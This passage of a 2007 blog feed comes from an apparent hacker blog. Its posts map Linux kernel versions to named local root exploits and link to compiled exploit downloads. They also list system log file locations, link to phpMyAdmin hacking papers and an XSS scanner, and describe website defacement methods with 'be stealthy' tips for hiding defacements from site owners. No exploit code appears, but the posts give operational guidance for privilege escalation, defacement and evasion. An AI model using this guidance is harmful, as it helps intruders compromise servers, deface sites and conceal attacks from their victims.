type='text'>SOME LIST OF KERNEL LOCAL EXPLOITS</title><content type='html'>This is really useful. Tells you which exploits are suited to which kernels&lt;br /&gt;&lt;br /&gt;2.4.17 &lt;br /&gt;newlocal &lt;br /&gt;kmod &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.18 &lt;br /&gt;brk &lt;br /&gt;brk2 &lt;br /&gt;newlocal &lt;br /&gt;kmod &lt;br /&gt;km.2 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.19 &lt;br /&gt;brk &lt;br /&gt;brk2 &lt;br /&gt;newlocal &lt;br /&gt;kmod &lt;br /&gt;km.2 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.20 &lt;br /&gt;ptrace &lt;br /&gt;kmod &lt;br /&gt;ptrace-kmod &lt;br /&gt;km.2 &lt;br /&gt;brk &lt;br /&gt;brk2 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.21 &lt;br /&gt;km.2 &lt;br /&gt;brk &lt;br /&gt;brk2 &lt;br /&gt;ptrace &lt;br /&gt;ptrace-kmod &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.22 &lt;br /&gt;km.2 &lt;br /&gt;brk2 &lt;br /&gt;brk &lt;br /&gt;ptrace &lt;br /&gt;ptrace-kmod &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.22-10 &lt;br /&gt;loginx &lt;br /&gt;./loginx &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.23 &lt;br /&gt;mremap_pte &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.24 &lt;br /&gt;mremap_pte &lt;br /&gt;Uselib24 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.25-1 &lt;br /&gt;uselib24 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.27 &lt;br /&gt;Uselib24 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.0 &lt;br /&gt;REDHAT 6.2 &lt;br /&gt;REDHAT 6.2 (zoot) &lt;br /&gt;SUSE 6.3 &lt;br /&gt;SUSE 6.4 &lt;br /&gt;REDHAT 6.2 (zoot) &lt;br /&gt;all top from rpm &lt;br /&gt;------------------------- &lt;br /&gt;FreeBSD 3.4-STABLE from port &lt;br /&gt;FreeBSD 3.4-STABLE from packages &lt;br /&gt;freeBSD 3.4-RELEASE from port &lt;br /&gt;freeBSD 4.0-RELEASE from packages &lt;br /&gt;---------------------------- &lt;br /&gt;all with wuftpd 2.6.0; &lt;br /&gt;= &lt;br /&gt;wuftpd &lt;br /&gt;h00lyshit &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.2 &lt;br /&gt;mremap_pte &lt;br /&gt;krad &lt;br /&gt;h00lyshit &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.5 to 2.6.10 &lt;br /&gt;krad &lt;br /&gt;krad2 &lt;br /&gt;h00lyshit &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.8-5 &lt;br /&gt;krad2 &lt;br /&gt;./krad x &lt;br /&gt;x = 1..9 &lt;br /&gt;h00lyshit &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.9-34 &lt;br /&gt;r00t &lt;br /&gt;h00lyshit &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.13-17 &lt;br /&gt;prctl &lt;br /&gt;h00lyshit &lt;br /&gt;&lt;br /&gt;------------------- &lt;br /&gt;&lt;br /&gt;2.4.17    -&gt; newlocal, kmod, uselib24 &lt;br /&gt;2.4.18    -&gt; brk, brk2, newlocal, kmod &lt;br /&gt;2.4.19    -&gt; brk, brk2, newlocal, kmod &lt;br /&gt;2.4.20    -&gt; ptrace, kmod, ptrace-kmod, brk, brk2 &lt;br /&gt;2.4.21    -&gt; brk, brk2, ptrace, ptrace-kmod &lt;br /&gt;2.4.22    -&gt; brk, brk2, ptrace, ptrace-kmod &lt;br /&gt;2.4.22-10 -&gt; loginx &lt;br /&gt;2.4.23    -&gt; mremap_pte &lt;br /&gt;2.4.24    -&gt; mremap_pte, uselib24 &lt;br /&gt;2.4.25-1  -&gt; uselib24 &lt;br /&gt;2.4.27    -&gt; uselib24 &lt;br /&gt;2.6.2     -&gt; mremap_pte, krad, h00lyshit &lt;br /&gt;2.6.5     -&gt; krad, krad2, h00lyshit &lt;br /&gt;2.6.6     -&gt; krad, krad2, h00lyshit &lt;br /&gt;2.6.7     -&gt; krad, krad2, h00lyshit &lt;br /&gt;2.6.8     -&gt; krad, krad2, h00lyshit &lt;br /&gt;2.6.8-5   -&gt; krad2, h00lyshit &lt;br /&gt;2.6.9     -&gt; krad, krad2, h00lyshit &lt;br /&gt;2.6.9-34  -&gt; r00t, h00lyshit &lt;br /&gt;2.6.10    -&gt; krad, krad2, h00lyshit &lt;br /&gt;2.6.13    -&gt; raptor, raptor2, h0llyshit, prctl &lt;br /&gt;2.6.14    -&gt; raptor, raptor2, h0llyshit, prctl &lt;br /&gt;2.6.15    -&gt; raptor, raptor2, h0llyshit, prctl &lt;br /&gt;2.6.16    -&gt; raptor, raptor2, h0llyshit, prctl&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;compiled and .c exploits can be found here: http://meto5757.by.ru/l0c4lr00t/&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-8351680945124269223?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/8351680945124269223/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=8351680945124269223' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8351680945124269223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8351680945124269223'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/09/some-list-of-kernel-local-exploits.html' title='SOME LIST OF KERNEL LOCAL EXPLOITS'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4821657863094305098</id><published>2007-09-17T14:48:00.001+03:00</published><updated>2007-09-17T15:14:44.913+03:00</updated><title type='text'>PLAYING WITH SOME PHPMYADMIN</title><content type='html'>Guys at nnc made more of knew progress on phymyadmin hacking. And these are their papers.&lt;br /&gt;&lt;br /&gt;Paper:&lt;br /&gt;http://nnc.unkn0wn.eu/papers/pma/phpmyadmin.txt&lt;br /&gt;&lt;br /&gt;Sql1:&lt;br /&gt;http://nnc.unkn0wn.eu/papers/pma/sql1.txt&lt;br /&gt;&lt;br /&gt;Sql2:&lt;br /&gt;http://nnc.unkn0wn.eu/papers/pma/sql2.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secure your applications.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4821657863094305098?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4821657863094305098/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4821657863094305098' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4821657863094305098'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4821657863094305098'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/09/playing-with-some-phpmyadmin.html' title='PLAYING WITH SOME PHPMYADMIN'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3461459220666576370</id><published>2007-08-03T17:05:00.000+03:00</published><updated>2007-08-03T17:26:08.638+03:00</updated><title type='text'>Log Locations</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_afH8IKGSEeI/RrM5oPiXwmI/AAAAAAAAACM/v7PrAV78OFo/s1600-h/log+photo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp0.blogger.com/_afH8IKGSEeI/RrM5oPiXwmI/AAAAAAAAACM/v7PrAV78OFo/s400/log+photo.png" alt="" id="BLOGGER_PHOTO_ID_5094478967014408802" border="0" /&gt;&lt;/a&gt;Alot of guys asked me where most of the logs are kept, well the display photo on the left show logs of /var/log/secure&lt;br /&gt;&lt;br /&gt;Well, i will update later with Windows version.&lt;br /&gt;For now have this.&lt;br /&gt;&lt;br /&gt;&lt;span class="postbody"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="postbody"&gt;IRIX:&lt;br /&gt;=================&lt;br /&gt;&lt;br /&gt;/var/adm/SYSLOG&lt;br /&gt;/var/adm/sulog&lt;br /&gt;/var/adm/utmp&lt;br /&gt;/var/adm/utmpx&lt;br /&gt;/var/adm/wtmp&lt;br /&gt;/var/adm/wtmpx&lt;br /&gt;/var/adm/lastlog/username&lt;br /&gt;/usr/spool/lp/log&lt;br /&gt;/var/adm/lp/lpd-errs&lt;br /&gt;/usr/lib/cron/log&lt;br /&gt;/var/adm/loginlog&lt;br /&gt;/var/adm/pacct&lt;br /&gt;/var/adm/dtmp&lt;br /&gt;/var/adm/acct/sum/loginlog&lt;br /&gt;/var/adm/X0msgs&lt;br /&gt;/var/adm/crash/vmcore&lt;br /&gt;/var/adm/crash/unix&lt;br /&gt;&lt;br /&gt;AIX:&lt;br /&gt;=================&lt;br /&gt;&lt;br /&gt;/var/adm/pacct&lt;br /&gt;/var/adm/wtmp&lt;br /&gt;/var/adm/dtmp&lt;br /&gt;/var/adm/qacct&lt;br /&gt;/var/adm/sulog&lt;br /&gt;/var/adm/ras/errlog&lt;br /&gt;/var/adm/ras/bootlog&lt;br /&gt;/var/adm/cron/log&lt;br /&gt;/etc/utmp&lt;br /&gt;/etc/security/lastlog&lt;br /&gt;/etc/security/failedlogin&lt;br /&gt;/usr/spool/mqueue/syslog&lt;br /&gt;&lt;br /&gt;SunOS:&lt;br /&gt;=================&lt;br /&gt;&lt;br /&gt;/var/adm/messages&lt;br /&gt;/var/adm/aculogs&lt;br /&gt;/var/adm/aculog&lt;br /&gt;/var/adm/sulog&lt;br /&gt;/var/adm/vold.log&lt;br /&gt;/var/adm/wtmp&lt;br /&gt;/var/adm/wtmpx&lt;br /&gt;/var/adm/utmp&lt;br /&gt;/var/adm/utmpx&lt;br /&gt;/var/adm/log/asppp.log&lt;br /&gt;/var/log/syslog&lt;br /&gt;/var/log/POPlog&lt;br /&gt;/var/log/authlog&lt;br /&gt;/var/adm/pacct&lt;br /&gt;/var/lp/logs/lpsched&lt;br /&gt;/var/lp/logs/lpNet&lt;br /&gt;/var/lp/logs/requests&lt;br /&gt;/var/cron/log&lt;br /&gt;/var/saf/_log&lt;br /&gt;/var/saf/port/log&lt;br /&gt;&lt;br /&gt;Linux:&lt;br /&gt;=================&lt;br /&gt;&lt;br /&gt;/var/log/lastlog&lt;br /&gt;/var/log/telnetd&lt;br /&gt;/var/run/utmp&lt;br /&gt;/var/log/secure&lt;br /&gt;/root/.ksh_history&lt;br /&gt;/root/.bash_history&lt;br /&gt;/root/.bash_logut&lt;br /&gt;/var/log/wtmp&lt;br /&gt;/etc/wtmp&lt;br /&gt;/var/run/utmp&lt;br /&gt;/etc/utmp&lt;br /&gt;/var/log&lt;br /&gt;/var/adm&lt;br /&gt;/var/apache/log&lt;br /&gt;/var/apache/logs&lt;br /&gt;/usr/local/apache/log&lt;br /&gt;/usr/local/apache/logs&lt;br /&gt;/var/log/acct&lt;br /&gt;/var/log/xferlog&lt;br /&gt;/var/log/messages&lt;br /&gt;/var/log/proftpd/xferlog.legacy&lt;br /&gt;/var/log/proftpd.access_log&lt;br /&gt;/var/log/proftpd.xferlog&lt;br /&gt;/var/log/httpd/error_log&lt;br /&gt;/var/log/httpd/access_log&lt;br /&gt;/etc/httpd/logs/access_log&lt;br /&gt;/etc/httpd/logs/error_log&lt;br /&gt;/var/log/httpsd/ssl.access_log&lt;br /&gt;/var/log/httpsd/ssl_log&lt;br /&gt;/var/log/httpsd/ssl.access_log&lt;br /&gt;/etc/mail/access&lt;br /&gt;/var/log/qmail&lt;br /&gt;/var/log/smtpd&lt;br /&gt;/var/log/samba&lt;br /&gt;/var/log/samba-log.%m&lt;br /&gt;/var/lock/samba&lt;br /&gt;/root/.Xauthority&lt;br /&gt;/var/log/poplog&lt;br /&gt;/var/log/news.all&lt;br /&gt;/var/log/spooler&lt;br /&gt;/var/log/news&lt;br /&gt;/var/log/news/news&lt;br /&gt;/var/log/news/news.all&lt;br /&gt;/var/log/news/news.crit&lt;br /&gt;/var/log/news/news.err&lt;br /&gt;/var/log/news/news.notice&lt;br /&gt;/var/log/news/suck.err&lt;br /&gt;/var/log/news/suck.notice&lt;br /&gt;/var/spool/tmp&lt;br /&gt;/var/spool/errors&lt;br /&gt;/var/spool/logs&lt;br /&gt;/var/spool/locks&lt;br /&gt;/usr/local/www/logs/thttpd_log&lt;br /&gt;/var/log/thttpd_log&lt;br /&gt;/var/log/ncftpd/misclog.txt&lt;br /&gt;/var/log/ncftpd.errs&lt;br /&gt;/var/log/auth&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3461459220666576370?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3461459220666576370/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3461459220666576370' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3461459220666576370'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3461459220666576370'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/08/log-locations.html' title='Log Locations'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_afH8IKGSEeI/RrM5oPiXwmI/AAAAAAAAACM/v7PrAV78OFo/s72-c/log+photo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6832764927409182906</id><published>2007-07-16T16:58:00.000+03:00</published><updated>2007-07-16T17:10:13.777+03:00</updated><title type='text'>Script kiddy tutorial</title><content type='html'>1. You goto milw0rm, neworder, bugtrak (and so one) and you find the latest exploit for some deamon that you know the name off, (then u would guess it must be very common).&lt;br /&gt;&lt;br /&gt;2. You install the daemon locally, the vulnerable version and test the exploit locally, probably it's try, a hoax!!!&amp; u'll have to reinstall your PC a dozen times before you post the code and get laughed at with the "rm -rf /" in the code.&lt;br /&gt;&lt;br /&gt;3. You come and cry and stomp your feet in every forum on the network saying "how do i compile", after a month of so, you got yourself a .out (&lt;span style="font-weight: bold;"&gt;wtf&lt;/span&gt; is that???)&lt;br /&gt;&lt;br /&gt;4. Repeat step 3 with asking what is a .out&lt;br /&gt;&lt;br /&gt;5. Woho Your leet, time to prove it, goto step 6&lt;br /&gt;&lt;br /&gt;6. With your locally installed vulnerable daemon and exploit ready to go, you check out the banner of the daemon, and write it down&lt;br /&gt;&lt;br /&gt;7. You make yourself a little script that nmap a certain the port that deamon runs on and try to match the banner of the vulnerable one.&lt;br /&gt;&lt;br /&gt;8. Find an ip range of dedicated servers, cheap ones are the best, like some dedibx because there are thousand of people that just buy them and don't do anythnig with time or update them as they have no value.&lt;br /&gt;&lt;br /&gt;9. Scan them all NIGHT ...&lt;br /&gt;&lt;br /&gt;10. Wake up and run your leet download and compile the exploit.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;11. Get banned from all Forums, and look like a total retard.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;TO BE CONTINUED...........&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6832764927409182906?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6832764927409182906/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6832764927409182906' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6832764927409182906'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6832764927409182906'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/07/script-kiddy-tutorial.html' title='Script kiddy tutorial'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7818781789027144153</id><published>2007-07-14T16:15:00.000+03:00</published><updated>2007-07-14T16:28:44.201+03:00</updated><title type='text'>TURNING 26 TODAY</title><content type='html'>Hi,&lt;br /&gt;&lt;br /&gt; Well, i'm going to be 26 today, and i just had the best fooling ever from my friends. First they DOSed my server in the morning, then they made a stupid account in one of the forums i constantly browse and a senior member also, with a name chuksjonia-junior. Then everybody said its my kid turned hacker and he is selling hacked paypals, Lol! And ain't a father yet.&lt;br /&gt;&lt;br /&gt; And this is the best text i got today from a friend who got my number:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold; color: rgb(153, 0, 0);"&gt;Birth is a "START OF LIFE" beauty is a "ART OF LIFE" love is a "PART OF LIFE" Death is a "LAST OF LIFE" But friendship is a  "HEART OF LIFE" happy birthday 2 Chuks.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thanx for the support over the years guys. All the best this Saturday, bye.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7818781789027144153?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7818781789027144153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7818781789027144153' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7818781789027144153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7818781789027144153'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/07/turning-26-today.html' title='TURNING 26 TODAY'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4132456719682944650</id><published>2007-07-02T15:53:00.000+03:00</published><updated>2007-07-02T16:07:15.938+03:00</updated><title type='text'>THE XXS SCANNER DOWNLOAD</title><content type='html'>Hi,&lt;br /&gt;&lt;br /&gt;U can download the script here, if u didn't find it:&lt;br /&gt;&lt;br /&gt;http://41.206.42.174/chuksjonia/tools/xxs.py&lt;br /&gt;&lt;br /&gt;Its written in Python, so just compile it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4132456719682944650?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4132456719682944650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4132456719682944650' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4132456719682944650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4132456719682944650'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/07/xxs-scanner-download.html' title='THE XXS SCANNER DOWNLOAD'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-8727035194481331544</id><published>2007-06-30T20:55:00.000+03:00</published><updated>2007-07-02T17:13:51.674+03:00</updated><title type='text'>DEFACING SITES [Methods]</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_afH8IKGSEeI/RokFdlHP82I/AAAAAAAAACE/jPgo4cIxBzI/s1600-h/haxshell.png"&gt;&lt;img style="cursor: pointer; width: 300px; height: 225px;" src="http://bp0.blogger.com/_afH8IKGSEeI/RokFdlHP82I/AAAAAAAAACE/jPgo4cIxBzI/s400/haxshell.png" alt="" id="BLOGGER_PHOTO_ID_5082599660201177954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="postbody"&gt;&lt;span style="font-weight: bold;"&gt;Method 1 - Content replacement.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Using the existing server host, web server etc, replace the pages with defaced ones.&lt;br /&gt;- Prerequisite: own the server&lt;br /&gt;- To undo: delete the defaced pages and replace original ones.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 2 - Web server software reconfiguration.&lt;/span&gt;&lt;br /&gt;Using the existing server host and web server, reconfigure the web server to serve&lt;br /&gt;documents out of a different (possibly hidden) directory. For an added bonus, change&lt;br /&gt;permissions etc, to make it marginally harder to change back.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 3 - Web server software replacement.&lt;/span&gt;&lt;br /&gt;Destroy or disable the original web server, and replace it with another one, hidden&lt;br /&gt;possibly as a trojan in existing system programs - ensure that this starts up before&lt;br /&gt;any legit web server, thus rendering the original web server useless.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 4- Better web server software replacement.&lt;/span&gt;&lt;br /&gt;Destroy or disable the original web server, and trojan system programs, and/or make&lt;br /&gt;subtle configuration changes, or low-level network stuff, which causes&lt;br /&gt;defaced web pages to be served one way or another, by the machine. Take any other steps&lt;br /&gt;to ensure that it cannot be easily undone.&lt;br /&gt;&lt;br /&gt;For bonus points, put network firewalling / NAT in, such that the creators / owners of the&lt;br /&gt;web site still see the real site, but everyone else sees the defaced site.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 5 - Rerouting.&lt;/span&gt;&lt;br /&gt;Ignore the original web server and compromise a nearby router. Add a NAT rule such that&lt;br /&gt;web traffic gets rerouted to another machine where the defaced pages are served.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 6 - DNS hijacking.&lt;/span&gt;&lt;br /&gt;compromise the DNS. The higher level the better. Ideally compromise a top-level DNS and insert&lt;br /&gt;a fake A record in, at the root servers. Ideally point this to a network of zombie machines&lt;br /&gt;(using round-robin DNS), which are all in different countries.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 7 - Backbone routers.&lt;/span&gt;&lt;br /&gt;Compromise backbone routers and inject phoney IP routes to route traffic to the web site&lt;br /&gt;to a (network of) owned server(s).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 8 - Browser compromise.&lt;/span&gt;&lt;br /&gt;Compromise the distribution system of several major web browsers, and install backdoors&lt;br /&gt;which cause the web site to appear to be defaced&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 9 - ISP compromise.&lt;/span&gt;&lt;br /&gt;Compromise several major ISPs, either trojanning their install CDs, subvert their routers,or do several of the above.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method 10 - Some subtle combination of any of the above.&lt;/span&gt;&lt;br /&gt;Especially effective would be 1,2,4,5 and 6 for instance.&lt;br /&gt;&lt;br /&gt;A determined attacker would carry out all the compromises necessary for 1,2,4,5 and 6 ahead of time,set up zombies to serve various pages, and set all the triggers on the same time bomb.&lt;br /&gt;&lt;br /&gt;All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.&lt;br /&gt;&lt;br /&gt;Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Be Protected Methods.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Tips : Be Stealthy &lt;/span&gt;&lt;br /&gt;Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Tips : Be Stealthy &lt;/span&gt;&lt;br /&gt;Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Tips : Be Stealthy &lt;/span&gt;&lt;br /&gt;Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Tips : Be Stealthy&lt;/span&gt;&lt;br /&gt;Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins&lt;br /&gt;and web designers never use them)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt;&lt;br /&gt;Credits to my fellow friend, MuRd3rp0L!c3&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
